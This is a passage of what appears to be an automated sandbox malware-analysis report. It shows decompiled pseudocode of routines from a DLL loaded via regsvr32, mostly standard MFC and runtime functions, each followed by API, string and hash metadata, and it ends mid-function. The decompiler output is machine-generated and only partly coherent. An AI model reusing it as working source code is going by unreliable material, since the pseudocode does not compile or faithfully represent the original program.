                                                                                                                					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
                                                                                                                					L5:
                                                                                                                					_t35 = E10049097(_t69);
                                                                                                                					_t70 =  *_t35;
                                                                                                                					if( *_t35 == 0) {
                                                                                                                						_t36 = E10049097(__eflags);
                                                                                                                						_t57 = _v8;
                                                                                                                						 *_t36 = _v8;
                                                                                                                					} else {
                                                                                                                						E1000AD19( *((intOrPtr*)(E10049097(_t70))));
                                                                                                                						_pop(_t57);
                                                                                                                					}
                                                                                                                					_push( &_v48);
                                                                                                                					_push(_t62);
                                                                                                                					_push(_t55);
                                                                                                                					_t38 = E1001242B(_t55, _t57, 0, _t62, _t70);
                                                                                                                					_t71 = _t38;
                                                                                                                					if(_t38 == 0) {
                                                                                                                						_v48 = _a4;
                                                                                                                						_v44 = DefWindowProcA;
                                                                                                                						_v28 = _a16;
                                                                                                                						_v24 = _a8;
                                                                                                                						_v20 = _a12;
                                                                                                                						_push( &_v48);
                                                                                                                						_v36 = 0;
                                                                                                                						_v40 = 0;
                                                                                                                						_v32 = _t55;
                                                                                                                						_v16 = 0;
                                                                                                                						_v12 = _t62;
                                                                                                                						if(L10016FC9(_t55, _t57, 0, _t62, _t71) == 0) {
                                                                                                                							E1000C2E1(_t57);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t62;
                                                                                                                				}
                                                                                                                			}




























                                                                                                                0x10017157
                                                                                                                0x10017157

                                                                                                                APIs
                                                                                                                • __snprintf_s.LIBCMT ref: 100170A2
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • __snprintf_s.LIBCMT ref: 100170D4
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                • API String ID: 3029210900-2801496823
                                                                                                                • Opcode ID: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
                                                                                                                • Instruction ID: cdf93d0280f2cea4f25f4823816fbdce5615ba8bd02a0b44cf6043f8a17af632
                                                                                                                • Opcode Fuzzy Hash: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
                                                                                                                • Instruction Fuzzy Hash: B131FAB9900309EFDB12DFA9CC4199E7BF4FF49250F214066F908AB212D735EA90DB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E10025850(void* __ebx, long long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t34;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr _t60;
                                                                                                                				intOrPtr _t64;
                                                                                                                				intOrPtr _t67;
                                                                                                                				void* _t75;
                                                                                                                				long long* _t76;
                                                                                                                
                                                                                                                				_push(4);
                                                                                                                				E1004764D(0x1008f979, __ebx, __edi, __esi);
                                                                                                                				 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
                                                                                                                				_t34 =  *((intOrPtr*)(__ecx + 8));
                                                                                                                				_t78 = _t34 - 2;
                                                                                                                				if(_t34 != 2) {
                                                                                                                					__eflags = _t34 - 1;
                                                                                                                					if(_t34 != 1) {
                                                                                                                						 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
                                                                                                                						_t35 = _t75 - 0x10;
                                                                                                                						 *(_t75 - 4) = 1;
                                                                                                                						 *_t76 =  *__ecx;
                                                                                                                						__imp__#114(__ecx, __ecx,  *((intOrPtr*)(_t75 + 0x10)),  *((intOrPtr*)(_t75 + 0xc)), _t35);
                                                                                                                						__eflags = _t35;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							_push( *(_t75 - 0x10));
                                                                                                                							E1000B053(__ebx, _t75 + 0x10, __edi, __esi, __eflags);
                                                                                                                							 *(_t75 - 4) = 3;
                                                                                                                							L100010F5( *((intOrPtr*)(_t75 + 8)), __eflags, _t75 + 0x10);
                                                                                                                							_t60 =  *((intOrPtr*)(_t75 + 0x10));
                                                                                                                						} else {
                                                                                                                							L1000140B(_t75 + 0xc, E100184C0());
                                                                                                                							 *(_t75 - 4) = 2;
                                                                                                                							__eflags = L10001276(_t75 + 0xc, 0xd800);
                                                                                                                							_t64 =  *((intOrPtr*)(_t75 + 8));
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_push("Invalid DateTime");
                                                                                                                								E1000B543(__ebx, _t64, __edi, __esi, __eflags);
                                                                                                                							} else {
                                                                                                                								L100010F5(_t64, __eflags, _t75 + 0xc);
                                                                                                                							}
                                                                                                                							_t60 =  *((intOrPtr*)(_t75 + 0xc));
                                                                                                                						}
                                                                                                                						__eflags = _t60 + 0xfffffff0;
                                                                                                                						L100013E3(_t60 + 0xfffffff0, 1);
                                                                                                                						__imp__#6( *(_t75 - 0x10));
                                                                                                                					} else {
                                                                                                                						L1000140B(_t75 + 0xc, E100184C0());
                                                                                                                						 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
                                                                                                                						__eflags = L10001276(_t75 + 0xc, 0xd800);
                                                                                                                						_t67 =  *((intOrPtr*)(_t75 + 8));
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push("Invalid DateTime");
                                                                                                                							E1000B543(__ebx, _t67, __edi, __esi, __eflags);
                                                                                                                						} else {
                                                                                                                							L100010F5(_t67, __eflags, _t75 + 0xc);
                                                                                                                						}
                                                                                                                						L100013E3( *((intOrPtr*)(_t75 + 0xc)) + 0xfffffff0, 1);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(0x1009c448);
                                                                                                                					E1000B543(__ebx,  *((intOrPtr*)(_t75 + 8)), __edi, __esi, _t78);
                                                                                                                				}
                                                                                                                				return E10047725( *((intOrPtr*)(_t75 + 8)));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025857
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: Invalid DateTime
                                                                                                                • API String ID: 431132790-2190634649
                                                                                                                • Opcode ID: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
                                                                                                                • Instruction ID: 067318ef8cb8f0eea395baab5e4922b740af21be137fd8082c09c2c459eaa513
                                                                                                                • Opcode Fuzzy Hash: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
                                                                                                                • Instruction Fuzzy Hash: D0318B3850014AEBEB04DFA4CC42BEE3769FF00395F50C519F92A96196DF71AB44CB25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E100461BC(void* __ebx, void* __ecx, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				void* _v64;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t18;
                                                                                                                				long _t23;
                                                                                                                				void* _t30;
                                                                                                                				void* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t31 = __ecx;
                                                                                                                				_t30 = __ebx;
                                                                                                                				_t33 = __ecx;
                                                                                                                				E10049170(__ecx,  &_v64, 0, 0x3c);
                                                                                                                				_t18 = _a4;
                                                                                                                				_v52 = 0x28;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_v64 =  *((intOrPtr*)(_t18 + 0x20));
                                                                                                                				} else {
                                                                                                                					_v64 = _v64 & _t18;
                                                                                                                				}
                                                                                                                				_v60 = _a8;
                                                                                                                				_v56 = _a12;
                                                                                                                				_t23 = SendMessageA( *(_t33 + 0x20), 0x40a, 0,  &_v64);
                                                                                                                				_pop(_t34);
                                                                                                                				if(_t23 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_push(E10047757(_t30, _t31, _a16, 0x30,  &_v52, 0x28));
                                                                                                                					L1000135C(_t30, _t31, _t34, _t35);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memcpy_s_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2479521229-3887548279
                                                                                                                • Opcode ID: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
                                                                                                                • Instruction ID: f95a88c069b750153419611af3e432d482e3ab38b6ba82756daf38a82866482c
                                                                                                                • Opcode Fuzzy Hash: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
                                                                                                                • Instruction Fuzzy Hash: 32010875A40209BFEB50DFA4DD86F9E77F8EB08640F204425BE05E62A1EBB4E9108B55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E10015735(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				_Unknown_base(*)()* _t17;
                                                                                                                				void* _t25;
                                                                                                                				void* _t26;
                                                                                                                				void* _t28;
                                                                                                                
                                                                                                                				_t28 = __eflags;
                                                                                                                				_t24 = __edi;
                                                                                                                				_t21 = __ebx;
                                                                                                                				E10021F6C(__ebx, _t25, __ebp, 0xc);
                                                                                                                				_push(E100147F3);
                                                                                                                				_t26 = E10020524(__ebx, 0x100bdba8, __edi, _t25, _t28);
                                                                                                                				_t29 = _t26;
                                                                                                                				if(_t26 == 0) {
                                                                                                                					E1000A069(_t21, 0x100bdba8, __edi, _t26, _t29);
                                                                                                                				}
                                                                                                                				_t30 =  *(_t26 + 8);
                                                                                                                				if( *(_t26 + 8) != 0) {
                                                                                                                					L7:
                                                                                                                					E10021FD9(0xc);
                                                                                                                					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                                				} else {
                                                                                                                					_push("hhctrl.ocx");
                                                                                                                					_t16 = E10012699(_t21, 0x100bdba8, _t24, _t26, _t30);
                                                                                                                					 *(_t26 + 4) = _t16;
                                                                                                                					if(_t16 != 0) {
                                                                                                                						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                                						__eflags = _t17;
                                                                                                                						 *(_t26 + 8) = _t17;
                                                                                                                						if(_t17 != 0) {
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						FreeLibrary( *(_t26 + 4));
                                                                                                                						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}












                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
                                                                                                                  • Part of subcall function 10021F6C: InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
                                                                                                                  • Part of subcall function 10021F6C: LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
                                                                                                                  • Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0
                                                                                                                  • Part of subcall function 10020524: __EH_prolog3_catch.LIBCMT ref: 1002052B
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_000147F3,0000000C), ref: 10015779
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 10015789
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                • API String ID: 2853499158-63838506
                                                                                                                • Opcode ID: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
                                                                                                                • Instruction ID: 2fddd1d9b1a741332842403885cf4ffdfe71f473e0a6c8fe02c8f939fbf869cd
                                                                                                                • Opcode Fuzzy Hash: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
                                                                                                                • Instruction Fuzzy Hash: 0401D139008712DAD720DB60AE06B4A76D0EF00792F094828F5AA9D4E0EB31D8909A22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E10055EF1() {
                                                                                                                				signed long long _v12;
                                                                                                                				signed int _v20;
                                                                                                                				signed long long _v28;
                                                                                                                				signed char _t8;
                                                                                                                
                                                                                                                				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                				if(_t8 == 0) {
                                                                                                                					L6:
                                                                                                                					_v20 =  *0x100a1cd0;
                                                                                                                					_v28 =  *0x100a1cc8;
                                                                                                                					asm("fsubr qword [ebp-0x18]");
                                                                                                                					_v12 = _v28 / _v20 * _v20;
                                                                                                                					asm("fld1");
                                                                                                                					asm("fcomp qword [ebp-0x8]");
                                                                                                                					asm("fnstsw ax");
                                                                                                                					if((_t8 & 0x00000005) != 0) {
                                                                                                                						return 0;
                                                                                                                					} else {
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                					if(__eax == 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_push(0);
                                                                                                                						return __eax;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,10048974), ref: 10055EF6
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10055F06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
                                                                                                                • Instruction ID: a772b1b7cee335b2c17c27fa0fa3100e138ae637c69f3d7f302d0602ea8ce6ac
                                                                                                                • Opcode Fuzzy Hash: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
                                                                                                                • Instruction Fuzzy Hash: 2FF05430910D1DD2EF009BA5AE5E6EF7BB8FB40787F820590D691E0094DF318174D751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10031021(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
                                                                                                                				signed int _v4;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _v40;
                                                                                                                				char _v124;
                                                                                                                				char _v168;
                                                                                                                				char _v176;
                                                                                                                				char _v184;
                                                                                                                				intOrPtr _v196;
                                                                                                                				signed int* __ebp;
                                                                                                                				signed int _t132;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t139;
                                                                                                                				void* _t140;
                                                                                                                				intOrPtr* _t145;
                                                                                                                				intOrPtr* _t148;
                                                                                                                				signed int _t149;
                                                                                                                				signed int _t151;
                                                                                                                				intOrPtr* _t152;
                                                                                                                				void* _t154;
                                                                                                                				intOrPtr* _t158;
                                                                                                                				signed int _t163;
                                                                                                                				intOrPtr _t164;
                                                                                                                				intOrPtr* _t166;
                                                                                                                				intOrPtr* _t168;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t182;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t185;
                                                                                                                				signed int* _t186;
                                                                                                                				void* _t187;
                                                                                                                				intOrPtr* _t188;
                                                                                                                				signed int _t202;
                                                                                                                				signed int _t204;
                                                                                                                				intOrPtr _t214;
                                                                                                                				intOrPtr _t220;
                                                                                                                				intOrPtr* _t222;
                                                                                                                				intOrPtr _t223;
                                                                                                                				signed int _t225;
                                                                                                                				void* _t228;
                                                                                                                				void* _t229;
                                                                                                                				void* _t231;
                                                                                                                				void* _t232;
                                                                                                                
                                                                                                                				_t188 = __ecx;
                                                                                                                				_t181 = __ebx;
                                                                                                                				_t232 = _t231 - 0x74;
                                                                                                                				_t225 =  &_v124;
                                                                                                                				_t132 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_a116 = _t132 ^ _t225;
                                                                                                                				_push(0x1c);
                                                                                                                				E1004764D(0x10090734, __ebx, __edi, __esi);
                                                                                                                				_t222 = __ecx;
                                                                                                                				_v16 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                				_a4 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                                					_t138 =  *(__ecx + 8);
                                                                                                                					__eflags = _t138;
                                                                                                                					if(_t138 != 0) {
                                                                                                                						_t215 =  &_a12;
                                                                                                                						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x100a429c,  &_a12,  &_a8);
                                                                                                                						__eflags = _t139;
                                                                                                                						if(_t139 >= 0) {
                                                                                                                							E1002D337( &_a12,  &_a20, 0x100a6910);
                                                                                                                							_a52 = _a52 | 0xffffffff;
                                                                                                                							_a44 = 0;
                                                                                                                							_a48 = 0;
                                                                                                                							_a56 = 0x18;
                                                                                                                							_a60 = 0;
                                                                                                                							_a64 = 0x1fb;
                                                                                                                							E1002D337( &_a12,  &_a68, 0x100a6838);
                                                                                                                							_t145 = _a12;
                                                                                                                							_a100 = _a100 | 0xffffffff;
                                                                                                                							_t215 =  &_a20;
                                                                                                                							_a92 = 0x1c;
                                                                                                                							_a96 = 0;
                                                                                                                							_a104 = 0x20;
                                                                                                                							_a108 = 0;
                                                                                                                							_a112 = 0x1e;
                                                                                                                							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
                                                                                                                							__eflags = _t183;
                                                                                                                							if(_t183 >= 0) {
                                                                                                                								_t215 = 0;
                                                                                                                								_v40 = _a8;
                                                                                                                								_t148 = _a12;
                                                                                                                								_v36 = 1;
                                                                                                                								_v32 = 0;
                                                                                                                								_v28 = 0;
                                                                                                                								_v24 = 0;
                                                                                                                								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
                                                                                                                								__eflags = _t149;
                                                                                                                								 *_t225 = _t149;
                                                                                                                								if(_t149 >= 0) {
                                                                                                                									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
                                                                                                                									_t151 = _v20;
                                                                                                                									_a8 = _t151;
                                                                                                                									 *(_t222 + 0x10) = _t151;
                                                                                                                									_t152 = _a12;
                                                                                                                									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
                                                                                                                									 *((intOrPtr*)( *_t152 + 8))(_t152);
                                                                                                                									goto L32;
                                                                                                                								} else {
                                                                                                                									_t166 = _a12;
                                                                                                                									 *((intOrPtr*)( *_t166 + 8))(_t166);
                                                                                                                								}
                                                                                                                								goto L50;
                                                                                                                							} else {
                                                                                                                								_t168 = _a12;
                                                                                                                								 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                                                                								_t139 = _t183;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t139 = 0;
                                                                                                                					}
                                                                                                                					goto L51;
                                                                                                                				} else {
                                                                                                                					__eax =  *(__esi + 0x4c);
                                                                                                                					__ecx =  *__eax;
                                                                                                                					__edx =  &_a16;
                                                                                                                					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x100a616c, __edx);
                                                                                                                					__eflags = __eax;
                                                                                                                					 *__ebp = __eax;
                                                                                                                					if(__eax < 0) {
                                                                                                                						L51:
                                                                                                                						 *[fs:0x0] = _v12;
                                                                                                                						_pop(_t220);
                                                                                                                						_pop(_t223);
                                                                                                                						_pop(_t182);
                                                                                                                						_t140 = E1004763E(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
                                                                                                                						__eflags =  &_a120;
                                                                                                                						return _t140;
                                                                                                                					} else {
                                                                                                                						__eax = _a16;
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__edx =  &_a8;
                                                                                                                						_push( &_a8);
                                                                                                                						_push(0x100a611c);
                                                                                                                						_push(__eax);
                                                                                                                						__eflags = __eax;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							__eax = _a8;
                                                                                                                							__edx =  &_a12;
                                                                                                                							_push( &_a12);
                                                                                                                							_push(0x100a628c);
                                                                                                                							_a12 = 0;
                                                                                                                							__ecx =  *__eax;
                                                                                                                							_push(__eax);
                                                                                                                							__eflags = __eax;
                                                                                                                							if(__eflags >= 0) {
                                                                                                                								__eax = _a12;
                                                                                                                								__ecx =  *__eax;
                                                                                                                								__edx = __esi + 0x58;
                                                                                                                								__edx =  *(__esi + 4);
                                                                                                                								__edx =  *(__esi + 4) + 0xe8;
                                                                                                                								__eflags = __edx;
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
                                                                                                                								__eax = _a12;
                                                                                                                								__ecx =  *__eax;
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                							}
                                                                                                                							__eax = _a8;
                                                                                                                							__ecx =  *__eax;
                                                                                                                							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                						}
                                                                                                                						__eax = E10009F14(__eflags, 0x14);
                                                                                                                						__eflags = __eax - __edi;
                                                                                                                						if(__eax == __edi) {
                                                                                                                							__eax = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							__ecx = __eax;
                                                                                                                							__eax = E10030855(__eax, _a16);
                                                                                                                						}
                                                                                                                						 *(__esi + 0x50) = __eax;
                                                                                                                						__eax = _a16;
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                						__eax =  *(__esi + 0x50);
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__eflags =  *__eax - __edi;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = __eax;
                                                                                                                							__eax = E1002D6F5(__ecx, __eax);
                                                                                                                						}
                                                                                                                						__eax = E10009F14(__eflags, 0x28);
                                                                                                                						__eflags = __eax - __edi;
                                                                                                                						if(__eax == __edi) {
                                                                                                                							__eax = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							__ecx = __eax;
                                                                                                                							__eax = E1002C138(__eax, __edi, 0x1f40);
                                                                                                                						}
                                                                                                                						__edx =  *(__esi + 0x50);
                                                                                                                						 *(__esi + 0x54) = __eax;
                                                                                                                						_push( *( *(__esi + 0x50)));
                                                                                                                						__ecx = __eax;
                                                                                                                						__eax =  *(__esi + 0x54);
                                                                                                                						__ecx =  *(__esi + 0x50);
                                                                                                                						 *(__ecx + 8) =  *(__esi + 0x54);
                                                                                                                						__eax =  *(__esi + 0x54);
                                                                                                                						__eax =  *( *(__esi + 0x54) + 0xc);
                                                                                                                						__eflags = __eax - 0x3333333;
                                                                                                                						 *(__esi + 0x10) = __eax;
                                                                                                                						if(__eax <= 0x3333333) {
                                                                                                                							__eax = __eax * 0x28;
                                                                                                                							__imp__CoTaskMemAlloc(__eax);
                                                                                                                							__ecx = 0;
                                                                                                                							__eflags = __eax - __edi;
                                                                                                                							__ecx = 0 | __eflags != 0x00000000;
                                                                                                                							 *(__esi + 0x14) = __eax;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
                                                                                                                								__eax = E10049170(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
                                                                                                                								__ecx =  *(__esi + 0x50);
                                                                                                                								__eax = E10030877( *(__esi + 0x50));
                                                                                                                								__ecx =  *(__esi + 0x50);
                                                                                                                								__eax = E1002D5A1(__ecx);
                                                                                                                								L32:
                                                                                                                								__eflags =  *(_t222 + 0x10);
                                                                                                                								_a16 = 0;
                                                                                                                								if( *(_t222 + 0x10) > 0) {
                                                                                                                									_t187 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									do {
                                                                                                                										_t163 = E10009F14(__eflags, 0x1c);
                                                                                                                										_a8 = _t163;
                                                                                                                										__eflags = _t163;
                                                                                                                										_v4 = 0;
                                                                                                                										if(_t163 == 0) {
                                                                                                                											_t164 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t164 = E100222C1(_t163, 0xa);
                                                                                                                										}
                                                                                                                										_v4 = _v4 | 0xffffffff;
                                                                                                                										_a16 = _a16 + 1;
                                                                                                                										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
                                                                                                                										_t187 = _t187 + 0x28;
                                                                                                                										__eflags = _a16 -  *(_t222 + 0x10);
                                                                                                                									} while (__eflags < 0);
                                                                                                                								}
                                                                                                                								_t185 = _v16;
                                                                                                                								__eflags = _t185;
                                                                                                                								if(_t185 != 0) {
                                                                                                                									__eflags = _a4;
                                                                                                                									if(_a4 > 0) {
                                                                                                                										_t154 = 0xffffffdc;
                                                                                                                										_t186 = _t185 + 0x24;
                                                                                                                										_a16 = _a4;
                                                                                                                										_a8 = _t154 - _v16;
                                                                                                                										while(1) {
                                                                                                                											_t202 =  *( *_t186 + 4);
                                                                                                                											__eflags = _t202;
                                                                                                                											_a4 = _t202;
                                                                                                                											if(_t202 == 0) {
                                                                                                                												goto L46;
                                                                                                                											}
                                                                                                                											while(1) {
                                                                                                                												_t158 = E10012115( &_a4);
                                                                                                                												_t215 =  *_t222;
                                                                                                                												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
                                                                                                                												__eflags = _a4;
                                                                                                                												if(_a4 == 0) {
                                                                                                                													goto L46;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											L46:
                                                                                                                											E100221A7( *_t186);
                                                                                                                											_t204 =  *_t186;
                                                                                                                											__eflags = _t204;
                                                                                                                											if(_t204 != 0) {
                                                                                                                												 *((intOrPtr*)( *_t204 + 4))(1);
                                                                                                                											}
                                                                                                                											_t186 =  &(_t186[0xa]);
                                                                                                                											_t127 =  &_a16;
                                                                                                                											 *_t127 = _a16 - 1;
                                                                                                                											__eflags =  *_t127;
                                                                                                                											if( *_t127 != 0) {
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                											goto L49;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									L49:
                                                                                                                									__imp__CoTaskMemFree(_v16);
                                                                                                                								}
                                                                                                                								L50:
                                                                                                                								_t139 =  *_t225;
                                                                                                                								goto L51;
                                                                                                                							} else {
                                                                                                                								_push(_t225);
                                                                                                                								_t228 = _t232;
